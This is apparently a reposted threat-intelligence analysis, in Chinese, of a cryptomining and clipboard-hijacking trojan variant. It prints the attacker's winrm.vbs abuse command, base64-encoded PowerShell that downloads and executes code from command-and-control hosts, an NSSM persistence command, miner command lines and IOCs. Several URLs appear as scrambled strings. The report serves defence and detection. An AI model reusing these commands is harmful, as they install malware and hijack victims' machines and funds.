0x1背景

腾讯御见威胁情报中心近期发现“美人蝎”挖矿木马新变种，该变种从9月开始感染量出现上涨。该挖矿木马延续“美人蝎”矿工木马的部分特点，如从下载的图片中获取恶意代码，通过多种矿机挖取多种数字加密货币，同时也有若干新特性。

“美人蝎”挖矿木马变种采用的新特性包括：

白利用winrm.vbs启动powershell脚本，或通过NSSM将powershell脚本安装为服务，多次将恶意代码通过内存注入系统白进程来减少文件落地，从而躲避系统安全功能或杀毒软件的拦截。

注：winrm.vbs是位于system32目录下具有Windows签名的脚本文件，是一个正常系统文件。NSSM是一款服务管理工具，具有自动守护功能，使用该工具安装服务后会使恶意代码难以检测，反复执行。

分析发现“美人蝎”挖矿木马变种对杀毒软件明显心存畏惧，当检测到电脑有常见杀毒软件运行时，会选择退出逃避。因而，这个新变种发布后近两个月的时间里，其挖矿收益甚微。这也证明，杀毒软件对病毒木马产业具有一定的威慑力。

“美人蝎”挖矿木马变种的技术特点总结如下：

1.利用Winrm.vbs（有微软数字签名的白应用）加载恶意代码，这种机制有较大可能性骗过系统安全功能和杀毒软件的拦截；

2.恶意代码运行前，会检查本机是否运行常见的安全软件，如果有，就退出；

3.检测到任务管理器进程，就暂停门罗币挖矿进程，防止用户观察到异常系统资源占用；

4.监控剪切板内容，若中毒电脑进行以太坊币或比特币交易，资金就会转入病毒作者控制的钱包地址。

5.利用NSSM服务管理工具，将Powershell恶意脚本安装为服务，使恶意代码难以检测，由服务来持续判断当前环境是否已经感染成功，若未成功则重新下载木马进行感染。

“美人蝎”变种木马与之前版本的异同：

相同点：

• 通过下载的激活工具等软件捆绑传播；
  
• 下载图片，从图片中获取恶意代码，且开始地址标记为“0x33E0F0D”；
  
• 使用gominer、xmrig等多种矿机挖取多种数字加密货币。
  

不同点：

• 不再使用DNS隧道通信；
  
• 图片中裹挟Loader木马改为裹挟木马主体；
  
• 木马主体、挖矿木马均通过内存注入系统白进程，减少文件落地；
  
• 新增剪切板盗取钱包功能；
  
• 启动方式改为NSSM，白利用winrm.vbs启动Powershell脚本。
  

 “美人蝎”挖矿木马变种的工作流程

0x2详细分析

0x2.1 winrm.vbs利用

winrm.vbs（一个位于system32目录下的具有Windows签名的脚本文件）可以被用来调用用户定义的XSL文件。

当向winrm.vbs提供’-format:pretty’或者’-format:text’参数时，winrm.vbs将从cscript.exe所在目录读取WsmPty.xsl或Wsmtxt.xsl文件。攻击者利用有微软数字签名的白应用加载恶意代码，这种机制有较大可能性骗过系统安全功能和安全软件的拦截。

木马利用过程如下：

1、创建文件C:\Users\Public\WsmPty.xsl；

2、拷贝cscript.exe到C:\Users\Public\目录；

3、通过以下命令行执行winrm.vbs从而调用WsmPty.xsl

C:\Users\Public\cscript.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

4、利用成功后执行powershell命令:

powershell.exe -nop -noni -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAAoASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBwAHMALgBuAGEAbQBlAGEAcABwAC4AdwBlAGIAcwBpAHQAZQAnACkAKQA=

powershell命令base64解码:

Start-Sleep -Seconds 20

IEX ((new-object net.webclient).downloadstring('723K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8K6i4K6u0W2L8X3q4E0k6h3q4H3M7q4)9J5k6i4N6W2j5Y4y4A6N6r3g2Q4x3U0N6Q4x3U0W2Q4x3U0V1`.

Powershell执行后从hxxp://ps.nameapp.website返回代码web.ps1

执行powershell代码hxxp://web.websitete.website/web.ps1

Web.ps1检测以下进程（判断存在杀软环境或机器已经感染过），则退出powershell：

360tray

360sd

zhudongfangyu

QQPcTray

kxetray

HipsTray

cmd

calc

osk

然后下载hxxp://web.websitete.website/ppp.exe到目录C:\Users\Public\conhost.exe并启动。

0x2.2傀儡进程

conhost会从网站下载jpg文件

hxxp://shop.ybk001.com/memberpic/wabpek201895135056776189.jpg，判断文件大小如果小于600000则从另外一个网址下载jpeg文件

hxxp://a17K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6V1H3y4e0p5K6x3K6M7@1y4%4l9#2x3W2)9J5k6h3A6H3k6h3N6Q4c8e0y4Q4z5o6m8Q4z5o6t1`.

“美人蝎”新变种在图片使用上已由美女图变为Windows7系统默认桌面背景图。但是图片中裹挟PE文件的加密数据标记依然采用4字节“0x33E0F0D”，并在开始标记随后4字节记录内存大小。

（参考：“美人蝎”矿工通过DNS隧道技术逃避拦截18fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3!0A6N6h3N6d9N6$3u0r3L8r3S2Y4b7$3D9H3L8p5&6X3x3q4)9J5k6p5W2a6N6#2!0q4c8W2!0n7b7#2)9^5z5b7`.`.

下载图片

用下载的文件大小减去0xBA3DC得到偏移值offset，接着将FileData+offset拷贝到一块新内存。

判断到内存的头4字节为0x33E0F0D，是则使用第二个四字节乘以2作为数据的大小，然后调用zlib库的uncompress函数将数据解析解压，解压后即可得到一个PE文件。

然后创建傀儡进程，然后将图片解密出的数据替换进程内存，创建失败则换一个傀儡进程，共3个（cmd.exe、calc.exe、osk.exe）。

0x2.3对抗杀软

0x2.3.1检测进程

开始运行检测到杀软进程时，将自身退出。

接下来的分析发现，病毒代码中还有在运行过程中利用COM接口枚举杀软进程，并对杀软进程进行强制结束并删除文件的动作。当病毒运行时，主要以逃避杀毒软件为主，若病毒先感染，用户后安装杀毒软件时，这个对抗行为才有可能得逞。

同时会检查taskmgr.exe任务管理器进程是否运行中，如果运行中则将XMR挖矿进程挂起，防止用户通过taskmgr进程找到CPU异常的进程，当taskmgr进程关闭后，重新恢复XMR挖矿进程。

0x2.3.2阻止联网

将一段文本覆盖写出到系统的hosts文件，屏蔽杀软访问网络。

将域名360.cn、360.com映射到IP 102.54.94.97

将5cdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0x3$3x3q4)9J5k6h3y4F1i4@1f1K6i4K6R3H3i4K6R3I4N6%4N6%4i4K6u0W2x3K6j5H3i4K6u0W2j5$3!0E0i4@1f1$3i4K6V1^5i4@1p5H3i4@1f1#2i4@1t1H3i4K6R3@1i4@1f1#2i4K6R3^5i4@1t1H3d9g2l9`. 38.25.63.10

这个对抗行为和上面的逻辑类似，若杀软已安装，病毒检测到就会退出。若病毒先运行，杀毒软件后安装，则进行对抗。

0x2.4盗取钱包

通过检查剪切板内容，截获用户交易过程中使用的数字加密货币地址来盗取收益。

启动线程递归调用自身，每隔1000ms获取剪切板内容。

若匹配到内容长度符合以太坊钱包格式，则将其替换为0xe986654707f147f425a34a6087b5b2b18cdc408f

若检测内容长度符合比特币钱包格式，则将其替换为

0x2.5挖矿

0x2.5.1门罗币挖矿

通过解密函数解密出门罗币矿机PE

该矿机采用开源门罗币挖矿程序XMRig 2.6.4编译（github地址：hxxps://github.com/xmrig/xmrig）

创建第二阶段傀儡进程（带参数），使用解密出的门罗币矿机来填充内存，创建失败则换一个傀儡进程，共3个（svchost.exe、cmd.exe、calc.exe）。

门罗币矿机PE填充到傀儡进程

挖矿命令行：

-a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5 -p x

矿池：

pool.minexmr.com

钱包：

485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5

收益：3.82个门罗币

从钱包支付记录来看，该挖矿木马从8月1号开始上线，目前挖得门罗币3.82个。

0x2.5.2比特无限挖矿

木马主体从网站下载jpeg文件

hxxp://eb4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6V1H3y4e0p5K6x3U0R3J5z5r3u0S2L8#2)9J5k6h3A6H3k6h3N6Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4z5o6S2Q4b7e0c8Q4c8e0k6Q4z5e0k6Q4b7f1c8Q4c8e0k6Q4z5e0k6Q4z5o6N6Q4c8e0c8Q4b7V1u0Q4b7U0k6Q4c8e0g2Q4b7e0c8Q4b7e0N6Q4c8e0g2Q4b7U0m8Q4z5p5k6Q4c8e0g2Q4b7e0k6Q4z5o6u0Q4c8e0k6Q4z5f1g2Q4z5f1y4Q4c8e0g2Q4b7U0m8Q4z5p5k6Q4c8e0c8Q4b7V1q4Q4z5p5f1I4y4U0b7$3y4o6l9$3i4@1f1#2i4K6R3^5i4K6V1&6i4@1f1@1i4@1u0n7i4K6S2q4i4@1f1#2i4K6S2r3i4@1p5$3i4@1f1#2i4@1p5@1i4K6V1$3i4@1f1@1i4@1t1^5i4K6R3H3i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1%4i4@1u0p5i4K6V1I4i4@1f1#2i4K6W2p5i4K6R3H3i4@1f1@1i4@1t1^5i4K6S2n7i4@1f1^5i4@1u0p5i4@1u0p5K9Y4m8Y4i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3

hxxps://s15.postimg.cc/43qcmc1d7/999.jpg。

图片中裹挟的PE加密数据经过解密后得到BCX（比特无限）矿机gominer，保存文件为C:\Users\***\AppData\Local\Temp\audiodg.exe，并使用以下参数启动挖矿进程

audiodg.exe -url stratum+tcp://bcx.vvpool.com:5660 -user XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB.c -I 18

解密出的Gominer开源矿机

（github地址：hxxps://github.com/bitcoinx-project/gominer/tree/master/clients/stratum）

矿池2：

Bcx.vvpool.com

钱包2：

XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB

从8月9日开始产生收益，已挖得422863个BCX

0x2.6持续感染

木马使用NSSM安装powershell恶意脚本为服务，NSSM是一款服务管理工具，具有自动守护功能，使用该工具安装服务后会使恶意代码难以检测，反复执行。

install nssm powershell.exe -nop -noni -w hidden -enc RwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAbgBzAHMAbQAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAMAAKAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcABzAC4AbgBhAG0AZQBhAHAAcAAuAHcAZQBiAHMAaQB0AGUAJwApACkA

base64解码：

Get-Process -Name nssm | Stop-Process

Start-Sleep -Seconds 80

powershell脚本作为服务反复执行，持续判断当前环境是否已经感染，否则重新下载木马进行感染。

0x3关联分析

经过分析，我们发现此样本应该是此前腾讯威胁情报中心曝光过的：“美人蝎”挖矿木马，相关原文链接：3c7K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3!0A6N6h3N6d9N6$3u0r3L8r3S2Y4b7$3D9H3L8p5&6X3x3q4)9J5k6p5W2a6N6H3`.`.

之所以这样认定，主要根据此样本和“美人蝎”木马样本在如下方面存在相似性：

1.      样本都是将挖矿程序隐藏在一张正常的图片中。

2.      样本在调用zlib解压过程中使用的函数调用跳转代码一致。

3.      下载回来的图片的数据标识及结构上一致。

4.      样本在进行代码混淆方面使用的手段很像。

5.      样本使用的BCX、XMR挖矿样本一致。

基于以上特征，我们可以认定此样本就是“美人蝎”挖矿木马作者利用winrm.vbs白利用技术发起的新一轮攻击。

两次活动中加密数据布局

函数调用跳转代码

而从作者的收益上看比上次有所减少，目前只有一万多人民币，但是这里有个需要注意的地方，那就是和上次样本一样，样本在整个感染过程中极力避免和国内的安全软件进行接触，一旦发现用户主机安全软件在运行则直接退出。

从这里我们可以看出，安全软件对病毒木马作者有一定的威慑能力，病毒木马作者发现自己跟杀毒软件的对抗无法取胜时，会选择逃避。因为杀毒软件的普及率较高，病毒又选择这种逃避的策略，因而这个“美人蝎”挖矿木马变种的挖矿收益较低。

                              木马获利情况

安全建议

1、这个“美人蝎”挖矿木马主要隐藏于一些盗版、破解、激活、游戏外挂等小工具软件中传播，腾讯安全专家建议用户不要使用来历不明的软件，不要随意使用破解、激活工具；

2、个人用户建议使用腾讯电脑管家拦截，这个挖矿木马检测到腾讯电脑管家在运行时，就会马上逃跑。

3、企业用户建议全网安装御点终端安全管理系统。（f9dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8Y4m8J5L8$3c8#2j5%4c8Q4x3V1k6&6k6q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2K9s2c8E0L8q4!0q4c8W2!0n7b7#2)9^5z5b7`.`.

IOCs

C2:

ps.nameapp.website

web.websitete.website

URL

hxxp://web.websitete.website/ppp.exe

hxxp://84bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6R3J5y4U0t1J5x3e0M7H3y4%4c8E0K9#2)9J5k6h3A6H3k6h3M7`.

hxxp://shop.ybk001.com/memberpic/ndtkbt2018826223028763405.jpg

hxxp://cf5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6R3J5y4U0t1I4x3K6R3I4y4K6R3H3k6#2)9J5k6h3A6H3k6h3M7`.

hxxps://s15.postimg.cc/lh3rhud57/999.jpg

hxxp://shop.ybk001.com/memberpic/wabpek201895135056776189.jpg

hxxp://2a4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6V1H3y4e0p5K6x3K6M7@1y4%4l9#2x3W2)9J5k6h3A6H3k6h3M7`.

hxxp://860K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6V1H3y4e0p5K6x3U0R3J5z5r3u0S2L8#2)9J5k6h3A6H3k6h3M7`.

hxxps://s15.postimg.cc/43qcmc1d7/999.jpg

hxxp://hao.ug118.com/ddd.jpg

hxxp://6dcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0p5&6z5e0m8@1N6g2)9J5k6h3y4G2L8g2)9J5c8X3W2Q4x3V1j5J5x3o6p5^5x3o6V1I4z5e0p5&6x3K6R3#2y4$3E0D9z5g2)9J5k6h3A6H3k6h3M7`.

矿池-钱包

pool.minexmr.com（门罗币）

485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5

44uyyeCqheLTQpZUTK5uXWVq8iwkn5w5L2hSPuMJACj5eNAPvceRWY8dEPu5rBcBEh5EJ5Z3PajkbWKCKzixDZCm1EFkMRg

bcx.vvpool.com（比特无限）

XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB

md5

7ddb1a0ed03151cd3ea76f7cb5ec28ae

4507f6f5f8dea3f651875866a5465876

f94aa36cd3086874c593298619ca8f14

7330aef076cf4498303e39031465dba5

ed3cc769e0eea63c83ac4648f0a72268

edd16109e74c0c96d006ee76c9abcbd6

47383a36d2bc68ae525dfe59d4a0f2fa

ffc962f058c5aaddc956dcf0455c04be

79f8daa3f4cd99591c9b47a0a3bfcc7a

6799501e58bd17b9db95a610d7167a07

a03aa449dbd18214eae3956ab2b2b24c

ad35b6aace32ea93691ec80c8148c82c

aa2d30992087047ef638674198209948

参考链接：

177K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3k6J5k6h3g2T1N6h3k6Q4x3X3g2U0L8$3#2Q4x3V1k6S2M7Y4c8A6j5$3I4W2M7#2)9J5c8Y4y4&6M7%4c8W2L8g2)9J5c8U0p5%4z5o6l9K6y4g2)9J5k6h3S2@1L8h3H3`.

195K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3L8%4y4@1M7#2)9J5k6i4y4H3k6h3y4@1k6i4u0G2M7s2y4Q4x3X3g2A6L8#2)9J5c8X3q4H3M7r3I4A6j5$3q4@1K9h3!0F1i4K6u0V1N6$3S2A6N6r3g2D9K9i4y4@1K9h3&6Y4i4K6u0V1j5Y4W2H3j5i4y4K6i4K6u0V1j5h3&6V1i4K6u0V1j5i4u0T1K9i4c8J5j5i4u0&6i4K6u0V1N6h3&6K6K9h3N6F1k6h3c8Q4x3X3c8U0L8$3c8W2i4K6u0V1k6i4S2W2j5%4g2@1K9h3!0F1i4K6u0V1N6r3g2U0K9r3&6A6M7i4g2W2i4K6u0V1K9h3&6Q4x3X3c8%4K9h3&6J5L8g2)9J5k6s2k6T1M7#2)9J5k6r3x3^5j5K6t1@1k6X3t1@1x3o6b7H3y4l9`.`.

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课